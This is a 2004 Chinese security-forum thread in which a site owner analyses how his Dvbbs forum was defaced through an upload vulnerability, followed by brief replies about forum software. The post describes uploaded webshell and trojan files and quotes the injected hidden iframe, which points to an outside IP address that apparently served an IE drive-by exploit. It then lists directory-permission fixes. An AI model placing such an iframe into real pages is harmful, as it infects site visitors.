|
 | 作者: gg_ss [gg_ss]
 论坛用户 |
登录 |
本站地址www.car.eia.cn 本站2004.5.21日被人篡改主页,导致望站关闭4小时.(16:40----21:00) 经过分析是使用"动网论坛上传文件漏洞"修改的。 从日志上分析,入侵过程大致是这样的。 时间16:50:14 ,入侵者利用漏洞成功的把ddd.asp上传到目录uploadFace。 ddd.asp为一个上传用asp页面,可以把代码上传到我的计算机任何目录成为一个文件。 时间16:50:13,入侵者通过ddd.asp页面成功把“海阳顶端网ASP木马XP”代码成功传到论坛主目录,形成文件zhuzhu.asp。 时间16:50:14,杀毒软件检测到zhuzhu.asp带有恶意代码,逐删除。也许是入侵者在无法调用zhuzhu.asp文件进行进一不入侵。于是改变方式,企图修改主页。 时间16:50:47,通过ddd.asp文件建立文件index222.asp。 时间16:50左右(由于已经恢复不能确定具体时间),通过ddd.asp文件建立文件index.asp替换了主页。 时间15:09,我发现主页无法正常显示,查看源文件其内容被改为一下内容。 <iframe src="http://218.90.219.142:88/mm.html" name="zhu" width="0" height="0" frameborder="0"> 请大家不要访问此页,因为没有打补丁的ie可能会被感染病毒. 时间15:12,通过其他几台计算机访问,返回结果同样。 时间15:14,通知关闭网络,主机仍开,保留现场。 时间17:19:34,服务器停止对外工作。 时间18:30,到达现场开始分析研究。首先检查防火墙及杀毒软件。杀毒软件记录了清除zhuzhu.asp病毒的时间。防火墙有一些端口探测的记录。查看进程 无异常,查看开放的断口 无异常。开始使用搜索查找今天创建和修改过的文件,发现16:50时段产生和改变的文件如上记录的4个asp。 用ie打开http://***/uploadFace/ddd.asp 发现其功能,实验证明此文件可以容易上传文件到目录下,判断其他3 个文件为此方法加入。 累了,吃饭。 回来后确定没有被下木马后门等,开网,不过没有提供web及ftp服务(上网查资料)。通过搜索引擎查到“动网--乾坤大挪移大法”,简单看了一下,因为文中同样提到uploadFace的问题,于是以为是使用此法入侵,修补bug。 突然发现,服务器工作优点异常,查看进程 无异常,查看端口 无异常,查看at 无异常。重起服务器。 修改他上传的ddd.asp文件,改为“警告提示”,并加入记录ip的代码,等待其再次出现。(也许会来,也许不会.可惜,还没出现) 开网服务,已经21:00点了。(今天是周末也)因为不知道为什么上传的文件名没有被论坛代码修改为规则的文件名,感到奇怪,怀疑不是通过正常途径上传的,但是查验半天没有发现系统后门,于是继续在网上查找论坛漏洞的消息. 时间21:30 细看“动网--乾坤大挪移大法”发现不是使用此方法入侵。继续搜索,发现"动网论坛上传文件漏洞的原理以及攻击的代码实现"一文,经过分析测试,为此法入侵。一时找不到解决方案,改upfile.asp文件名停止上传服务。 时间10:30 还是不知道怎么修改这个bug,只好用vb写了个程序,时时监视uploadFace等文件夹中的文件类型是否正常。恢复上传功能。 第二天,突然想到一个方法,实验了一下还不错.(其实是弄了半天也没想到怎么改代码才能补漏洞) 方法如下 把uploadFace,UploadFile,uploadimages三个目录从论坛主目录中移动出来,随便放一个位置. 然后进入系统的"Internet 服务管理器"分别建立三个别名与上三个目录同名的虚拟目录,注意:这三个虚拟目录的 属性只选择读取,不允许执行脚本. 这样就把这三个目录还是在bbs的主目录下,经过上传等测试,使用正常。于是在此目录下服务执行脚本程序,虽然没有有修补代漏洞,但对方利用这个漏洞上传的恶意脚本代码也无法使用。为什么不直接设置这三个目录不执行脚本,而移动出来呢,主要是考虑到不保护论坛主目录的真实的地址,不过好象没有这个必要.当然如果是租用的服务器空间自然无法这样做吧,建议大家升级论坛版本吧。大家要把.asp的属性设置只读,给替换增加难度. 从日志上看此入侵者操作时所用时间很短,应该是上传文件事先已经准备好了的,也许是使用此法入侵了数个论坛。 (文中ddd.asp为化名,因为他还没有再次出现所以不透露真实文件名。) 谢谢了,请大家多指教了。 http://autobot.126.com QQ:10828592 o0oo0oo0o@163.com 希望和大家交流一下,请大家不要黑我,我知道动网很多,而已每个人 keyi 2004.5.22 [此贴被 gg_ss(gg_ss) 在 05月22日22时55分 编辑过] [此贴被 gg_ss(gg_ss) 在 05月23日14时35分 编辑过] |
| 地主 发表时间: 04-05-22 21:57 |
 | 回复: abctm [abctm]  版主 |
登录 |
|
asp的论坛就是不行 速度也不好,如果是access的帖子多了慢,而且不安全 还好我用CTB的php论坛 有空楼主参观一下 www.20cn.bak.cn |
| B1层 发表时间: 04-05-22 22:13 |
 | 回复: lilong [lilong]  论坛用户 |
登录 |
|
有没有谁用SQL数据库的? |
| B2层 发表时间: 04-05-22 22:18 |
| 回复: gg_ss [gg_ss] 论坛用户 |
登录 |
|
我用过一段时间mysql数据库的ipb论坛,感觉不错,后来为什么不用我也不知道,插件少的原因吧 |
| B3层 发表时间: 04-05-22 22:59 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 网站建设
标题: 我的论坛是这样被入侵的---入侵分析[转帖]